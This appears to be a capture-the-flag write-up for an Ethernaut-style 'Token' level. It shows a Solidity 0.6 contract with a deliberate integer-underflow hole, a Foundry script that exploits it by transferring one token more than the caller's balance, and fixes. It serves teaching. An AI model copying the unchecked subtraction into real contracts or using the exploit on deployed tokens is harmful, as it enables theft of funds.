Level 5 - Token ⏺⏺

Level Setup

The goal of this level is for you to hack the basic token contract below.

You are given 20 tokens to start with and you will beat the level if you somehow manage to get your hands on any additional tokens. Preferably a very large amount of tokens.

Things that might help:

What is an odometer?

Level Contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Token {

  mapping(address => uint) balances;
  uint public totalSupply;

  constructor(uint _initialSupply) public {
    balances[msg.sender] = totalSupply = _initialSupply;
  }

  function transfer(address _to, uint _value) public returns (bool) {
    require(balances[msg.sender] - _value >= 0);
    balances[msg.sender] -= _value;
    balances[_to] += _value;
    return true;
  }

  function balanceOf(address _owner) public view returns (uint balance) {
    return balances[_owner];
  }
}

Exploit

The exploit is due to unsafe math in older versions of Solidity. The balance can underflow and cause a huge amount of tokens to be transferred.

Sending just 1 more token than the user balance causes the value to underflow.

make anvil-exploit-level-5

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>

make holesky-exploit-level-5

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>

script/Level5.s.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import {Script, console} from "forge-std/Script.sol";
import {HelperFunctions} from "script/HelperFunctions.s.sol";

interface IToken {
    function transfer(address _to, uint256 _value) external returns (bool);
    function balanceOf(address _owner) external view returns (uint256 balance);
}

// ================================================================
// │                         LEVEL 5 - TOKEN                      │
// ================================================================
contract Exploit is Script, HelperFunctions {
    function run() public {
        address targetContractAddress = getInstanceAddress();
        IToken targetContract = IToken(targetContractAddress);
        uint256 userStartingBalance = targetContract.balanceOf(msg.sender);

        vm.startBroadcast();
        targetContract.transfer(address(0), userStartingBalance + 1);
        vm.stopBroadcast();
    }
}

Submit instance... 🥳

Completion Message

NOT NEEDED IN SOLIDITY 0.8.0 AND HIGHER

Overflows are very common in solidity and must be checked for with control statements such as:

if(a + c > a) {
  a = a + c;
}

An easier alternative is to use OpenZeppelin's SafeMath library that automatically checks for overflows in all the mathematical operators. The resulting code looks like this:

a = a.add(c);

If there is an overflow, the code will revert.

Notes

This could easily be fixed using a different check instead of comparing to zero.

if (balances[msg.sender] < _value) revert Token__NotEnoughTokens();

Last updated 7 months ago

// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Token { mapping(address => uint) balances; uint public totalSupply; constructor(uint _initialSupply) public { balances[msg.sender] = totalSupply = _initialSupply; } function transfer(address _to, uint _value) public returns (bool) { require(balances[msg.sender] - _value >= 0); balances[msg.sender] -= _value; balances[_to] += _value; return true; } function balanceOf(address _owner) public view returns (uint balance) { return balances[_owner]; } }

// SPDX-License-Identifier: MIT pragma solidity ^0.8.18; import {Script, console} from "forge-std/Script.sol"; import {HelperFunctions} from "script/HelperFunctions.s.sol"; interface IToken { function transfer(address _to, uint256 _value) external returns (bool); function balanceOf(address _owner) external view returns (uint256 balance); } // ================================================================ // │ LEVEL 5 - TOKEN │ // ================================================================ contract Exploit is Script, HelperFunctions { function run() public { address targetContractAddress = getInstanceAddress(); IToken targetContract = IToken(targetContractAddress); uint256 userStartingBalance = targetContract.balanceOf(msg.sender); vm.startBroadcast(); targetContract.transfer(address(0), userStartingBalance + 1); vm.stopBroadcast(); } }